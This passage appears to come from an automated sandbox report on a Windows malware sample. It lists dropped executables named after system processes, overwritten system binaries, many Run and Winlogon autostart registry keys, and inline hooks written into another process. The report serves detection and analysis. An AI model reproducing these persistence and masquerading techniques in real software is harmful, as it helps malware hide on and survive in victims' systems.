                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE6B5 push ecx; ret 21_2_00007FFD34CAE6C5
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE678 push edx; ret 21_2_00007FFD34CAE679
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CA2825 push E8FFFFFFh; retf 21_2_00007FFD34CA2831
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE793 push ecx; ret 21_2_00007FFD34CAE79A
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 24_2_00007FFD3488474F pushad ; iretd 24_2_00007FFD34884755
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 24_2_00007FFD34884BAC push es; retf 24_2_00007FFD34884BAF
                                    Source: msinto.exe.2.drStatic PE information: section name: .text entropy: 7.5421860659259625
                                    Source: backgroundTaskHost.exe.10.drStatic PE information: section name: .text entropy: 7.5421860659259625

                                    Persistence and Installation Behavior

                                    barindex
                                    Drops PE files with benign system names
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile created: C:\Users\user\AppData\Local\Temp\explorer.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Recovery\lsass.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\debug\explorer.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
                                    Drops executables to the windows directory (C:\Windows) and starts them
                                    Source: unknownExecutable created and started: C:\Windows\debug\explorer.exe
                                    Source: unknownExecutable created and started: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\mFVAeiee.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile created: C:\Users\user\AppData\Local\Temp\explorer.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\iGvrsCDf.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\AEdPygqV.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\SIVCnSke.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Recovery\lsass.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\debug\explorer.exeJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\kRRssUig.logJump to dropped file
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\JfNMDZUx.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\crpSXvpM.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\blockhostnet\msinto.exeJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\admBIJoy.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\debug\explorer.exeJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\AEdPygqV.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\crpSXvpM.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\SIVCnSke.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Users\user\Desktop\JfNMDZUx.logJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\mFVAeiee.logJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\kRRssUig.logJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\iGvrsCDf.logJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile created: C:\Users\user\Desktop\admBIJoy.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an autostart registry key pointing to binary in C:\Windows
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUAJump to behavior
                                    Creates an undocumented autostart registry key
                                    Source: C:\blockhostnet\msinto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockhostnet\msinto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockhostnet\msinto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockhostnet\msinto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockhostnet\msinto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockhostnet\msinto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msintoJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUAJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUAJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUAJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUAJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUAJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msintoJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msintoJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msintoJump to behavior
                                    Source: C:\blockhostnet\msinto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msintoJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeMemory written: PID: 3460 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeMemory written: PID: 3460 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeMemory written: PID: 3460 base: 7FFDB45A000D value: E9 BB CB EB FF Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeMemory written: PID: 3460 base: 7FFDB445CBC0 value: E9 5A 34 14 00 Jump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
